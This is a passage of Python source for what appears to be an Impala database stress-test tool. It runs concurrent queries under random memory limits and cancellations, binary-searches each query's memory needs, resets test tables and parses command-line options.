self._query_producer_thread = create_and_start_daemon_thread(
enqueue_queries, "Query Producer")
def _start_consuming_queries(self, impala):
def start_additional_runners_if_needed():
try:
while self._total_num_queries_submitted() < self._num_queries_to_run:
# TODO: sleeping for the below amount leads to slower submission than the goal,
# because it does not factor in the time spent by this thread outside of the
# sleep() call.
sleep(1.0 / self.startup_queries_per_sec)
# Remember num dequeued/started are cumulative.
with self._submit_query_lock:
metrics = self._calc_total_runner_metrics()
num_dequeued = metrics[NUM_QUERIES_DEQUEUED]
num_submitted = metrics[NUM_QUERIES_SUBMITTED]
LOG.debug("Submitted {0} queries. Dequeued {1} queries".format(
num_submitted, num_dequeued))
if num_dequeued != num_submitted:
# Assume dequeued queries are stuck waiting for cluster resources so there
# is no point in starting an additional runner.
continue
num_coordinators = len(impala.impalads)
if self.max_coordinators > 0:
num_coordinators = min(num_coordinators, self.max_coordinators)
impalad = impala.impalads[len(self._query_runners) % num_coordinators]
query_runner = QueryRunner(impalad=impalad, results_dir=self.results_dir,
use_kerberos=self.use_kerberos,
common_query_options=self.common_query_options,
test_admission_control=self.test_admission_control)
query_runner.proc = \
Process(target=self._start_single_runner, args=(query_runner, ))
query_runner.proc.daemon = True
with self._query_runners_lock:
self._query_runners.append(query_runner)
query_runner.proc.start()
LOG.info("Consuming thread completed job. Exiting...")
except Exception as e:
LOG.error("Error consuming queries: %s", e)
current_thread().error = e
raise e
self._query_consumer_thread = create_and_start_daemon_thread(
start_additional_runners_if_needed, "Query Consumer")
def _start_polling_mem_usage(self, impala):
def poll_mem_usage():
if self.leak_check_interval_mins:
self._next_leak_check_unix_time.value = int(
time() + 60 * self.leak_check_interval_mins)
query_submission_is_locked = False
# Query submission will be unlocked after a memory report has been collected twice
# while no queries were running.
ready_to_unlock = None
try:
while self._total_num_queries_submitted() < self._num_queries_to_run:
if ready_to_unlock:
assert query_submission_is_locked, "Query submission not yet locked"
assert not self._total_num_queries_active(), "Queries are still running"
LOG.debug("Resuming query submission")
self._next_leak_check_unix_time.value = int(
time() + 60 * self.leak_check_interval_mins)
self._submit_query_lock.release()
query_submission_is_locked = False
ready_to_unlock = None
if (
not query_submission_is_locked and
self.leak_check_interval_mins and
time() > self._next_leak_check_unix_time.value
):
assert self._total_num_queries_active() <= self._num_runners_remaining(), \
"Each running query should belong to a runner"
LOG.debug("Stopping query submission")
self._submit_query_lock.acquire()
query_submission_is_locked = True
max_reported, max_actual = self._get_mem_usage_values()
if max_reported != -1 and max_actual != -1:
# Value were already retrieved but haven't been used yet. Assume newer
# values aren't wanted and check again later.
sleep(1)
continue
try:
max_reported = max(impala.find_impalad_mem_mb_reported_usage())
except Timeout:
LOG.debug("Timeout collecting reported mem usage")
max_reported = -1
try:
max_actual = max(impala.find_impalad_mem_mb_actual_usage())
except Timeout:
LOG.debug("Timeout collecting reported actual usage")
max_actual = -1
self._set_mem_usage_values(max_reported, max_actual)
if query_submission_is_locked and not self._total_num_queries_active():
if ready_to_unlock is None:
ready_to_unlock = False
else:
ready_to_unlock = True
except Exception:
LOG.debug("Error collecting impalad mem usage", exc_info=True)
if query_submission_is_locked:
LOG.debug("Resuming query submission")
self._submit_query_lock.release()
self._mem_polling_thread = create_and_start_daemon_thread(
poll_mem_usage, "Mem Usage Poller")
def _get_mem_usage_values(self, reset=False):
reported = None
actual = None
with self._max_mem_mb_reported_usage.get_lock():
with self._max_mem_mb_usage.get_lock():
reported = self._max_mem_mb_reported_usage.value
actual = self._max_mem_mb_usage.value
if reset:
self._max_mem_mb_reported_usage.value = -1
self._max_mem_mb_usage.value = -1
return reported, actual
def _set_mem_usage_values(self, reported, actual):
with self._max_mem_mb_reported_usage.get_lock():
with self._max_mem_mb_usage.get_lock():
self._max_mem_mb_reported_usage.value = reported
self._max_mem_mb_usage.value = actual
def _start_single_runner(self, query_runner):
"""Consumer function to take a query of the queue and run it. This is intended to
run in a separate process so validating the result set can use a full CPU.
"""
LOG.debug("New query runner started")
# The query runner should already be set up. We just need to connect() before using
# the runner.
query_runner.connect()
while not self._query_queue.empty():
try:
query = self._query_queue.get(True, 1)
except Empty:
continue
except EOFError:
LOG.debug("Query running aborting due to closed query queue")
break
LOG.debug("Getting query_idx")
with self._query_runners_lock:
query_idx = self._calc_total_runner_metric_no_lock(NUM_QUERIES_DEQUEUED)
query_runner.increment_metric(NUM_QUERIES_DEQUEUED)
LOG.debug("Query_idx: {0} | PID: {1}".format(query_idx, query_runner.proc.pid))
if not query.required_mem_mb_without_spilling:
mem_limit = query.required_mem_mb_with_spilling
solo_runtime = query.solo_runtime_secs_with_spilling
elif self.spill_probability < random():
mem_limit = query.required_mem_mb_without_spilling
solo_runtime = query.solo_runtime_secs_without_spilling
else:
mem_limit = randrange(
query.required_mem_mb_with_spilling,
query.required_mem_mb_without_spilling + 1)
solo_runtime = query.solo_runtime_secs_with_spilling
LOG.debug("Waiting for other query runners to start their queries")
while query_idx > self._total_num_queries_submitted():
sleep(0.1)
self._mem_mb_needed_for_next_query.value = mem_limit
LOG.debug("Requesting memory reservation")
with self._mem_broker.reserve_mem_mb(mem_limit) as reservation_id:
LOG.debug("Received memory reservation")
with self._submit_query_lock:
query_runner.increment_metric(NUM_QUERIES_SUBMITTED)
cancel_mech = None
if self.cancel_probability > random():
# Exercise both timeout mechanisms.
if random() > 0.5:
cancel_mech = CancelMechanism.VIA_CLIENT
else:
cancel_mech = CancelMechanism.VIA_OPTION
timeout = randrange(1, max(int(solo_runtime), 2))
else:
# Let the query run as long as necessary - it is nearly impossible to pick a
# good value that won't have false positives under load - see IMPALA-8222.
timeout = maxint
report = query_runner.run_query(query, mem_limit, timeout_secs=timeout,
cancel_mech=cancel_mech)
LOG.debug("Got execution report for query")
if report.timed_out and cancel_mech:
report.was_cancelled = True
query_runner.update_from_query_report(report)
if report.other_error:
error_msg = str(report.other_error)
# There is a possible race during cancellation. If a fetch request fails (for
# example due to hitting a mem limit), just before the cancellation request, the
# server may have already unregistered the query as part of the fetch failure.
# In that case the server gives an error response saying the handle is invalid.
if "Invalid or unknown query handle" in error_msg and report.timed_out:
self._num_successive_errors.value = 0
continue
# Occasionally the network connection will fail, and depending on when the
# failure occurred during run_query(), an attempt to get the profile may be
# made which results in "Invalid session id" since the server destroyed the
# session upon disconnect.
if "Invalid session id" in error_msg:
self._num_successive_errors.value = 0
continue
# The server may fail to respond to clients if the load is high. An error
# message with "connect()...Connection timed out" comes from the impalad so
# that will not be ignored.
if (
("Connection timed out" in error_msg and "connect()" not in error_msg) or
"ECONNRESET" in error_msg or
"couldn't get a client" in error_msg or
"timeout: timed out" in error_msg
):
self._num_successive_errors.value = 0
continue
increment(self._num_successive_errors)
query_runner.increment_metric(NUM_OTHER_ERRORS)
self._write_query_profile(report, PROFILES_DIR, prefix='error')
raise Exception("Query {query} ID {id} failed: {mesg}".format(
query=query.logical_query_id,
id=report.query_id,
mesg=error_msg))
if (
report.not_enough_memory and (self.test_admission_control or
not self._mem_broker.was_overcommitted(reservation_id))
):
increment(self._num_successive_errors)
self._write_query_profile(
report, PROFILES_DIR, prefix='unexpected_mem_exceeded')
raise Exception("Unexpected mem limit exceeded; mem was not overcommitted. "
"Query ID: {0}".format(report.query_id))
if (
not report.timed_out and not report.has_query_error() and
(self._verify_results and report.result_hash != query.result_hash)
):
increment(self._num_successive_errors)
query_runner.increment_metric(NUM_RESULT_MISMATCHES)
self._write_query_profile(report, PROFILES_DIR, prefix='incorrect_results')
raise Exception(dedent("""\
Result hash mismatch; expected {expected}, got {actual}
Query ID: {id}
Query: {query}""".format(expected=query.result_hash,
actual=report.result_hash,
id=report.query_id,
query=query.logical_query_id)))
if report.timed_out and not cancel_mech:
self._write_query_profile(report, PROFILES_DIR, prefix='timed_out')
raise Exception(
"Query {query} unexpectedly timed out. Query ID: {id}".format(
query=query.logical_query_id, id=report.query_id))
self._num_successive_errors.value = 0
LOG.debug("Query runner completed...")
def _print_status_header(self):
print(" | ".join(self._status_headers))
def _print_status(self, print_header=False):
if print_header:
self._print_status_header()
metrics = self._calc_total_runner_metrics()
reported_mem, actual_mem = self._get_mem_usage_values(reset=True)
status_format = " | ".join(["%%%ss" % len(header) for header in self._status_headers])
print(status_format % (
# Done
metrics[NUM_QUERIES_FINISHED],
# Active
metrics[NUM_QUERIES_SUBMITTED] - metrics[NUM_QUERIES_FINISHED],
# Executing
metrics[NUM_QUERIES_STARTED_RUNNING_OR_CANCELLED] -
metrics[NUM_QUERIES_FINISHED],
# Mem Lmt Ex
metrics[NUM_QUERIES_EXCEEDED_MEM_LIMIT],
# AC Rejected
metrics[NUM_QUERIES_AC_REJECTED],
# AC Timed Out
metrics[NUM_QUERIES_AC_TIMEDOUT],
# Cancel
metrics[NUM_QUERIES_CANCELLED],
# Err
metrics[NUM_OTHER_ERRORS],
# Incorrect
metrics[NUM_RESULT_MISMATCHES],
# Next Qry Mem Lmt
self._mem_mb_needed_for_next_query.value,
# Total Qry Mem Lmt
self._mem_broker.total_mem_mb - self._mem_broker.available_mem_mb,
# Tracked Mem
"" if reported_mem == -1 else reported_mem,
# RSS Mem
"" if actual_mem == -1 else actual_mem))
def _write_query_profile(self, report, subdir, prefix=None):
report.write_query_profile(
os.path.join(self.results_dir, subdir),
prefix)
def _check_successive_errors(self):
if (self._num_successive_errors.value >= self.num_successive_errors_needed_to_abort):
print(
"Aborting due to %s successive errors encountered"
% self._num_successive_errors.value, file=sys.stderr)
self.print_duration()
sys.exit(1)
def _check_for_test_failure(self):
metrics = self._calc_total_runner_metrics()
if metrics[NUM_OTHER_ERRORS] > 0 or metrics[NUM_RESULT_MISMATCHES] > 0:
LOG.error("Failing the stress test due to unexpected errors, incorrect results, or "
"timed out queries. See the report line above for details.")
self.print_duration()
sys.exit(1)
def _wait_for_test_to_finish(self, impala, should_print_status):
last_report_secs = 0
lines_printed = 1
sleep_secs = 0.1
num_runners_remaining = self._num_runners_remaining()
while (
self._query_producer_thread.is_alive() or
self._query_consumer_thread.is_alive() or
num_runners_remaining
):
if self._query_producer_thread.error or self._query_consumer_thread.error:
# This is bad enough to abort early. A failure here probably means there's a
# bug in this script. The mem poller could be checked for an error too. It is
# not critical so is ignored.
LOG.error("Aborting due to error in producer/consumer")
sys.exit(1)
do_check_for_impala_crashes = False
with self._query_runners_lock:
for idx, runner in enumerate(self._query_runners):
if runner.proc.exitcode is not None:
if runner.proc.exitcode != 0:
# Since at least one query runner process failed, make sure to check for
# crashed impalads.
do_check_for_impala_crashes = True
# TODO: Handle case for num_queries_dequeued != num_queries_submitted
num_submitted = runner.get_metric_val(NUM_QUERIES_SUBMITTED)
num_started_or_cancelled = \
runner.get_metric_val(NUM_QUERIES_STARTED_RUNNING_OR_CANCELLED)
num_finished = runner.get_metric_val(NUM_QUERIES_FINISHED)
if num_submitted != num_finished:
# The query runner process may have crashed before updating the number
# of finished queries but after it incremented the number of queries
# submitted.
assert num_submitted - num_finished == 1
runner.increment_metric(NUM_QUERIES_FINISHED)
if num_submitted != num_started_or_cancelled:
assert num_submitted - num_started_or_cancelled == 1
runner.increment_metric(NUM_QUERIES_STARTED_RUNNING_OR_CANCELLED)
# Since we know that the runner crashed while trying to run a query, we
# count it as an 'other error'
runner.increment_metric(NUM_OTHER_ERRORS)
self._check_successive_errors()
assert runner.get_metric_val(NUM_QUERIES_SUBMITTED) == \
runner.get_metric_val(NUM_QUERIES_FINISHED), \
str(runner.get_metric_vals())
# Make sure to record all the metrics before removing this runner from the
# list.
print("Query runner ({0}) exited with exit code {1}".format(
runner.proc.pid, runner.proc.exitcode))
self._record_runner_metrics_before_evict(self._query_runners[idx])
# Remove the query runner from the list.
del self._query_runners[idx]
if do_check_for_impala_crashes:
# Since we know that at least one query runner failed, check if any of the Impala
# daemons themselves crashed.
LOG.info("Checking for Impala crashes")
if print_crash_info_if_exists(impala, self.start_time):
self.print_duration()
sys.exit(runner.proc.exitcode)
do_check_for_impala_crashes = False
LOG.info("No Impala crashes detected")
sleep(sleep_secs)
num_runners_remaining = self._num_runners_remaining()
if should_print_status:
last_report_secs += sleep_secs
if last_report_secs > 5:
if (
not self._query_producer_thread.is_alive() or
not self._query_consumer_thread.is_alive() or
not num_runners_remaining
):
LOG.debug("Producer is alive: %s" % self._query_producer_thread.is_alive())
LOG.debug("Consumer is alive: %s" % self._query_consumer_thread.is_alive())
LOG.debug("Queue size: %s" % self._query_queue.qsize())
LOG.debug("Runners: %s" % num_runners_remaining)
last_report_secs = 0
lines_printed %= 50
self._print_status(print_header=(lines_printed == 0))
lines_printed += 1
def print_duration(self):
duration = datetime.now() - self.start_time
LOG.info("Test Duration: {0:.0f} seconds".format(duration.total_seconds()))
def load_random_queries_and_populate_runtime_info(impala, converted_args):
"""Returns a list of random queries. Each query will also have its runtime info
populated. The runtime info population also serves to validate the query.
"""
LOG.info("Generating random queries")
return populate_runtime_info_for_random_queries(
impala, generate_random_queries(impala, converted_args.random_db), converted_args)
def populate_runtime_info_for_random_queries(impala, candidate_queries, converted_args):
"""Returns a list of random queries selected from candidate queries, which should be
a generator that will return an unlimited number of randomly generated queries.
Each query will also have its runtime info populated. The runtime info population
also serves to validate the query.
"""
start_time = datetime.now()
queries = list()
# TODO(IMPALA-4632): Consider running reset_databases() here if we want to extend DML
# functionality to random stress queries as well.
for query in candidate_queries:
try:
populate_runtime_info(
query, impala, converted_args,
timeout_secs=converted_args.random_query_timeout_seconds)
queries.append(query)
except Exception as e:
# Ignore any non-fatal errors. These could be query timeouts or bad queries (
# query generator bugs).
if print_crash_info_if_exists(impala, start_time):
raise e
LOG.warn(
"Error running query (the test will continue)\n%s\n%s",
e, query.sql, exc_info=True)
if len(queries) == converted_args.random_query_count:
break
return queries
def populate_runtime_info(query, impala, converted_args, timeout_secs=maxint):
"""Runs the given query by itself repeatedly until the minimum memory is determined
with and without spilling. Potentially all fields in the Query class (except
'sql') will be populated by this method. 'required_mem_mb_without_spilling' and
the corresponding runtime field may still be None if the query could not be run
without spilling.
converted_args.samples and converted_args.max_conflicting_samples control the
reliability of the collected information. The problem is that memory spilling or usage
may differ (by a large amount) from run to run due to races during execution. The
parameters provide a way to express "X out of Y runs must have resulted in the same
outcome". Increasing the number of samples and decreasing the tolerance (max conflicts)
increases confidence but also increases the time to collect the data.
"""
LOG.info("Collecting runtime info for query %s: \n%s", query.name, query.sql)
samples = converted_args.samples
max_conflicting_samples = converted_args.max_conflicting_samples
results_dir = converted_args.results_dir
mem_limit_eq_threshold_mb = converted_args.mem_limit_eq_threshold_mb
mem_limit_eq_threshold_percent = converted_args.mem_limit_eq_threshold_percent
runner = QueryRunner(impalad=impala.impalads[0], results_dir=results_dir,
common_query_options=converted_args.common_query_options,
test_admission_control=converted_args.test_admission_control,
use_kerberos=converted_args.use_kerberos, check_if_mem_was_spilled=True)
runner.connect()
limit_exceeded_mem = 0
non_spill_mem = None
spill_mem = None
report = None
mem_limit = None
old_required_mem_mb_without_spilling = query.required_mem_mb_without_spilling
old_required_mem_mb_with_spilling = query.required_mem_mb_with_spilling
profile_error_prefix = query.logical_query_id + "_binsearch_error"
# TODO: This method is complicated enough now that breaking it out into a class may be
# helpful to understand the structure.
def update_runtime_info():
required_mem = min(mem_limit, impala.min_impalad_mem_mb)
if report.mem_was_spilled:
if (
query.required_mem_mb_with_spilling is None or
required_mem < query.required_mem_mb_with_spilling
):
query.required_mem_mb_with_spilling = required_mem
query.solo_runtime_secs_with_spilling = report.runtime_secs
query.solo_runtime_profile_with_spilling = report.profile
elif (
query.required_mem_mb_without_spilling is None or
required_mem < query.required_mem_mb_without_spilling
):
query.required_mem_mb_without_spilling = required_mem
query.solo_runtime_secs_without_spilling = report.runtime_secs
assert report.runtime_secs is not None, report
query.solo_runtime_profile_without_spilling = report.profile
def get_report(desired_outcome=None):
reports_by_outcome = defaultdict(list)
leading_outcome = None
for remaining_samples in xrange(samples - 1, -1, -1):
report = runner.run_query(query, mem_limit, run_set_up=True,
timeout_secs=timeout_secs, retain_profile=True)
if report.timed_out:
report.write_query_profile(
os.path.join(results_dir, PROFILES_DIR), profile_error_prefix)
raise QueryTimeout(
"query {0} timed out during binary search".format(query.logical_query_id))
if report.other_error:
report.write_query_profile(
os.path.join(results_dir, PROFILES_DIR), profile_error_prefix)
raise Exception(
"query {0} errored during binary search: {1}".format(
query.logical_query_id, str(report.other_error)))
LOG.debug("Spilled: %s" % report.mem_was_spilled)
if not report.has_query_error():
if query.result_hash is None:
query.result_hash = report.result_hash
elif query.result_hash != report.result_hash:
report.write_query_profile(
os.path.join(results_dir, PROFILES_DIR), profile_error_prefix)
raise Exception(
"Result hash mismatch for query %s; expected %s, got %s" %
(query.logical_query_id, query.result_hash, report.result_hash))
if report.not_enough_memory:
outcome = "EXCEEDED"
elif report.mem_was_spilled:
outcome = "SPILLED"
else:
outcome = "NOT_SPILLED"
reports_by_outcome[outcome].append(report)
if not leading_outcome:
leading_outcome = outcome
continue
if len(reports_by_outcome[outcome]) > len(reports_by_outcome[leading_outcome]):
leading_outcome = outcome
if len(reports_by_outcome[leading_outcome]) + max_conflicting_samples == samples:
break
if (
len(reports_by_outcome[leading_outcome]) + remaining_samples <
samples - max_conflicting_samples
):
return
if desired_outcome \
and len(reports_by_outcome[desired_outcome]) + remaining_samples \
< samples - max_conflicting_samples:
return
reports = reports_by_outcome[leading_outcome]
reports.sort(key=lambda r: r.runtime_secs)
return reports[len(reports) / 2]
if not any((old_required_mem_mb_with_spilling, old_required_mem_mb_without_spilling)):
mem_estimate = estimate_query_mem_mb_usage(query, runner.impalad_conn)
LOG.info("Finding a starting point for binary search")
mem_limit = min(mem_estimate, impala.min_impalad_mem_mb) or impala.min_impalad_mem_mb
while True:
LOG.info("Next mem_limit: {0}".format(mem_limit))
report = get_report()
if not report or report.not_enough_memory:
if report and report.not_enough_memory:
limit_exceeded_mem = mem_limit
if mem_limit == impala.min_impalad_mem_mb:
LOG.warn(
"Query couldn't be run even when using all available memory\n%s", query.sql)
return
mem_limit = min(2 * mem_limit, impala.min_impalad_mem_mb)
continue
update_runtime_info()
if report.mem_was_spilled:
spill_mem = mem_limit
else:
non_spill_mem = mem_limit
break
LOG.info("Finding minimum memory required to avoid spilling")
lower_bound = max(limit_exceeded_mem, spill_mem)
upper_bound = min(non_spill_mem or maxint, impala.min_impalad_mem_mb)
while True:
if old_required_mem_mb_without_spilling:
mem_limit = old_required_mem_mb_without_spilling
old_required_mem_mb_without_spilling = None
else:
mem_limit = (lower_bound + upper_bound) / 2
LOG.info("Next mem_limit: {0}".format(mem_limit))
should_break = mem_limit / float(upper_bound) > 1 - mem_limit_eq_threshold_percent \
or upper_bound - mem_limit < mem_limit_eq_threshold_mb
report = get_report(desired_outcome=("NOT_SPILLED" if spill_mem else None))
if not report:
lower_bound = mem_limit
elif report.not_enough_memory:
lower_bound = mem_limit
limit_exceeded_mem = mem_limit
else:
update_runtime_info()
if report.mem_was_spilled:
lower_bound = mem_limit
spill_mem = min(spill_mem, mem_limit)
else:
upper_bound = mem_limit
non_spill_mem = mem_limit
if mem_limit == impala.min_impalad_mem_mb:
break
if should_break:
if non_spill_mem:
break
lower_bound = upper_bound = impala.min_impalad_mem_mb
# This value may be updated during the search for the absolute minimum.
LOG.info(
"Minimum memory to avoid spilling: %s MB" % query.required_mem_mb_without_spilling)
LOG.info("Finding absolute minimum memory required")
lower_bound = limit_exceeded_mem
upper_bound = min(
spill_mem or maxint, non_spill_mem or maxint, impala.min_impalad_mem_mb)
while True:
if old_required_mem_mb_with_spilling:
mem_limit = old_required_mem_mb_with_spilling
old_required_mem_mb_with_spilling = None
else:
mem_limit = (lower_bound + upper_bound) / 2
LOG.info("Next mem_limit: {0}".format(mem_limit))
should_break = mem_limit / float(upper_bound) > 1 - mem_limit_eq_threshold_percent \
or upper_bound - mem_limit < mem_limit_eq_threshold_mb
report = get_report(desired_outcome="SPILLED")
if not report or report.not_enough_memory:
lower_bound = mem_limit
else:
update_runtime_info()
upper_bound = mem_limit
if should_break:
if not query.required_mem_mb_with_spilling:
if upper_bound - mem_limit < mem_limit_eq_threshold_mb:
# IMPALA-6604: A fair amount of queries go down this path.
LOG.info(
"Unable to find a memory limit with spilling within the threshold of {0} "
"MB. Using the same memory limit for both.".format(
mem_limit_eq_threshold_mb))
query.required_mem_mb_with_spilling = query.required_mem_mb_without_spilling
query.solo_runtime_secs_with_spilling = query.solo_runtime_secs_without_spilling
query.solo_runtime_profile_with_spilling = \
query.solo_runtime_profile_without_spilling
break
LOG.info("Minimum memory is %s MB" % query.required_mem_mb_with_spilling)
if (
query.required_mem_mb_without_spilling is not None and
query.required_mem_mb_without_spilling is not None and
query.required_mem_mb_without_spilling < query.required_mem_mb_with_spilling
):
# Query execution is not deterministic and sometimes a query will run without spilling
# at a lower mem limit than it did with spilling. In that case, just use the lower
# value.
LOG.info(
"A lower memory limit to avoid spilling was found while searching for"
" the absolute minimum memory.")
query.required_mem_mb_with_spilling = query.required_mem_mb_without_spilling
query.solo_runtime_secs_with_spilling = query.solo_runtime_secs_without_spilling
query.solo_runtime_profile_with_spilling = query.solo_runtime_profile_without_spilling
LOG.debug("Query after populating runtime info: %s", query)
def prepare_database(cursor):
"""For each table in the database that cursor is connected to, create an identical copy
with '_original' suffix. This function is idempotent.
Note: At this time we only support Kudu tables with a simple hash partitioning based on
the primary key. (SHOW CREATE TABLE would not work otherwise.)
"""
tables = dict((t, cursor.describe_table(t)) for t in cursor.list_table_names())
for table_name in tables:
if not table_name.endswith("_original") and table_name + "_original" not in tables:
LOG.debug("Creating original table: {0}".format(table_name))
cursor.execute("SHOW CREATE TABLE " + table_name)
create_sql = cursor.fetchone()[0]
search_pattern = r"CREATE TABLE (\w*)\.(.*) \("
replacement = "CREATE TABLE {tbl} (".format(tbl=table_name + "_original")
create_original_sql = re.sub(
search_pattern, replacement, create_sql, count=1)
LOG.debug("Create original SQL:\n{0}".format(create_original_sql))
cursor.execute(create_original_sql)
cursor.execute("INSERT INTO {0}_original SELECT * FROM {0}".format(table_name))
cursor.execute("COMPUTE STATS {0}".format(table_name + "_original"))
def reset_databases(cursor):
"""Reset the database to the initial state. This is done by overwriting tables which
don't have the _original suffix with data from tables with the _original suffix.
Note: At this time we only support Kudu tables with a simple hash partitioning based on
the primary key. (SHOW CREATE TABLE would not work otherwise.)
"""
LOG.info("Resetting {0} database".format(cursor.db_name))
tables = dict((t, cursor.describe_table(t)) for t in cursor.list_table_names())
for table_name in tables:
if not table_name.endswith("_original"):
if table_name + "_original" in tables:
cursor.execute("SHOW CREATE TABLE " + table_name)
create_table_command = cursor.fetchone()[0]
cursor.execute("DROP TABLE {0}".format(table_name))
cursor.execute(create_table_command)
cursor.execute("INSERT INTO {0} SELECT * FROM {0}_original".format(table_name))
cursor.execute("COMPUTE STATS {0}".format(table_name))
else:
LOG.debug("Table '{0}' cannot be reset because '{0}_original' does not"
" exist in '{1}' database.".format(table_name, cursor.db_name))
def populate_all_queries(
queries, impala, converted_args, queries_with_runtime_info_by_db_sql_and_options
):
"""Populate runtime info for all queries, ordered by the population_order property."""
result = []
queries_by_order = {}
for query in queries:
if query.population_order not in queries_by_order:
queries_by_order[query.population_order] = []
queries_by_order[query.population_order].append(query)
for population_order in sorted(queries_by_order.keys()):
for query in queries_by_order[population_order]:
if (
query.sql in
queries_with_runtime_info_by_db_sql_and_options[query.db_name] and
str(sorted(query.options.items())) in
queries_with_runtime_info_by_db_sql_and_options[query.db_name][query.sql]
):
LOG.debug("Reusing previous runtime data for query: " + query.sql)
result.append(queries_with_runtime_info_by_db_sql_and_options[
query.db_name][query.sql][str(sorted(query.options.items()))])
else:
populate_runtime_info(query, impala, converted_args)
save_runtime_info(converted_args.runtime_info_path, query, impala)
query.write_runtime_info_profiles(
os.path.join(converted_args.results_dir, PROFILES_DIR))
result.append(query)
return result
def main():
parser = ArgumentParser(
epilog=dedent("""
Before running this script a CM cluster must be setup and any needed data
such as TPC-H/DS must be loaded. The first time this script is run it will
find memory limits and runtimes for each query and save the data to disk (since
collecting the data is slow) at --runtime-info-path then run the stress test.
Later runs will reuse the saved memory limits and timings. If the cluster changes
significantly the memory limits should be re-measured (deleting the file at
--runtime-info-path will cause re-measuring to happen).""").strip(),
formatter_class=ArgumentDefaultsHelpFormatter)
cli_options.add_logging_options(parser)
cli_options.add_cluster_options(parser)
cli_options.add_kerberos_options(parser)
cli_options.add_ssl_options(parser)
parser.add_argument(
"--runtime-info-path",
default=os.path.join(gettempdir(), "{cm_host}_query_runtime_info.json"),
help="The path to store query runtime info at. '{cm_host}' will be replaced with"
" the actual host name from --cm-host.")
parser.add_argument(
"--samples", default=1, type=int,
help='Used when collecting "runtime info" - the number of samples to collect when'
' testing a particular mem limit value.')
parser.add_argument(
"--max-conflicting-samples", default=0, type=int,
help='Used when collecting "runtime info" - the number of samples outcomes that'
' can disagree when deciding to accept a particular mem limit. Ex, when trying to'
' determine the mem limit that avoids spilling with samples=5 and'
' max-conflicting-samples=1, then 4/5 queries must not spill at a particular mem'
' limit.')
parser.add_argument(
"--mem-limit-eq-threshold-percent", default=0.025,
type=float, help='Used when collecting "runtime info". If the difference between'
' two memory limits is less than this percentage, we consider the two limits to'
' be equal and stop the memory binary search.')
parser.add_argument(
"--mem-limit-eq-threshold-mb", default=50,
type=int, help='Used when collecting "runtime info". If the difference between'
' two memory limits is less than this value in MB, we consider the two limits to'
' be equal and stop the memory binary search.')
parser.add_argument(
"--results-dir", default=gettempdir(),
help="Directory under which the profiles and result_hashes directories are created."
" Query hash results are written in the result_hashes directory. If query results"
" do not match, a log file will be left in that dir. The log file is also created"
" during the first run when runtime info is collected for each query. Unexpected"
" query timeouts, exceeded memory, failures or result mismatches will result in a"
" profile written in the profiles directory.")
parser.add_argument(
"--no-status", action="store_true", help="Do not print the status table.")
parser.add_argument(
"--cancel-current-queries", action="store_true",
help="Cancel any queries running on the cluster before beginning.")
parser.add_argument(
"--filter-query-mem-ratio", type=float, default=0.333,
help="Queries that require this ratio of total available memory will be filtered.")
parser.add_argument(
"--startup-queries-per-second", type=float, default=2.0,
help="Adjust this depending on the cluster size and workload. This determines"
" the minimum amount of time between successive query submissions when"
" the workload is initially ramping up.")
parser.add_argument(
"--fail-upon-successive-errors", type=int, default=1,
help="Continue running until N query errors are encountered in a row. Set"
" this to a high number to only stop when something catastrophic happens. A"
" value of 1 stops upon the first error.")
parser.add_argument(
"--mem-limit-padding-pct", type=int, default=25,
help="Pad query mem limits found by solo execution with this percentage when"
" running concurrently. After padding queries will not be expected to fail"
" due to mem limit exceeded.")
parser.add_argument(
"--mem-limit-padding-abs", type=int, default=0,
help="Pad query mem limits found by solo execution with this value (in megabytes)"
" running concurrently. After padding queries will not be expected to fail"
" due to mem limit exceeded. This is useful if we want to be able to add the same"
" amount of memory to smaller queries as to the big ones.")
parser.add_argument(
"--timeout-multiplier", type=float, default=1.0,
help="Deprecated - has no effect.")
parser.add_argument("--max-queries", type=int, default=100)
parser.add_argument(
"--reset-databases-before-binary-search", action="store_true",
help="If True, databases will be reset to their original state before the binary"
" search.")
parser.add_argument(
"--reset-databases-after-binary-search", action="store_true",
help="If True, databases will be reset to their original state after the binary"
" search and before starting the stress test. The primary intent of this option is"
" to undo the changes made to the databases by the binary search. This option can"
" also be used to reset the databases before running other (non stress) tests on"
" the same data.")
parser.add_argument(
"--generate-dml-queries", action="store_true",
help="If True, DML queries will be generated for Kudu databases.")
parser.add_argument(
"--dml-mod-values", nargs="+", type=int, default=[11],
help="List of mod values to use for the DML queries. There will be 4 DML (delete,"
" insert, update, upsert) queries generated per mod value per table. The smaller"
" the value, the more rows the DML query would touch (the query should touch about"
" 1/mod_value rows.)")
parser.add_argument(
"--generate-compute-stats-queries", action="store_true",
help="If True, Compute Stats queries will be generated.")
parser.add_argument(
"--select-probability", type=float, default=0.5,
help="Probability of choosing a select query (as opposed to a DML query).")
parser.add_argument("--tpcds-db", help="If provided, TPC-DS queries will be used.")
parser.add_argument("--tpch-db", help="If provided, TPC-H queries will be used.")
parser.add_argument(
"--tpch-nested-db", help="If provided, nested TPC-H queries will be used.")
parser.add_argument(
"--tpch-kudu-db", help="If provided, TPC-H queries for Kudu will be used.")
parser.add_argument(
"--tpcds-kudu-db", help="If provided, TPC-DS queries for Kudu will be used.")
parser.add_argument(
"--random-db", help="If provided, random queries will be used.")
parser.add_argument(
"--random-query-count", type=int, default=50,
help="The number of random queries to generate.")
parser.add_argument(
"--random-query-timeout-seconds", type=int, default=(5 * 60),
help="A random query that runs longer than this time when running alone will"
" be discarded.")
parser.add_argument(
"--query-file-path", help="Use queries in the given file. The file"
" format must be the same as standard test case format. Queries are expected to "
" be randomly generated and will be validated before running in stress mode.")
parser.add_argument(
"--query-file-db",
help="The name of the database to use with the queries from --query-file-path.")
parser.add_argument("--mem-overcommit-pct", type=float, default=0)
parser.add_argument(
"--mem-spill-probability", type=float, default=0.33, dest="spill_probability",
help="The probability that a mem limit will be set low enough to induce spilling.")
parser.add_argument(
"--mem-leak-check-interval-mins", type=int, default=None,
help="Periodically stop query execution and check that memory levels have reset.")
parser.add_argument(
"--cancel-probability", type=float, default=0.1,
help="The probability a query will be cancelled.")
parser.add_argument("--nlj-filter", help=SUPPRESS) # Made a no-op by IMPALA-7440.
parser.add_argument(
"--common-query-options", default=None, nargs="*",
help="Space-delimited string of query options and values. This is a freeform "
"string with little regard to whether you've spelled the query options correctly "
"or set valid values. Example: --common-query-options "
"DISABLE_CODEGEN=true RUNTIME_FILTER_MODE=1")
parser.add_argument(
"--test-admission-control", type=bool, default=False,
help="If true, assume that the Impala cluster under test is using memory-based "
"admission control and should not admit queries that cannot be run to completion. "
"In this mode the stress runner does not set mem_limit on queries and "
"out-of-memory errors are not expected in this mode so will fail the stress test "
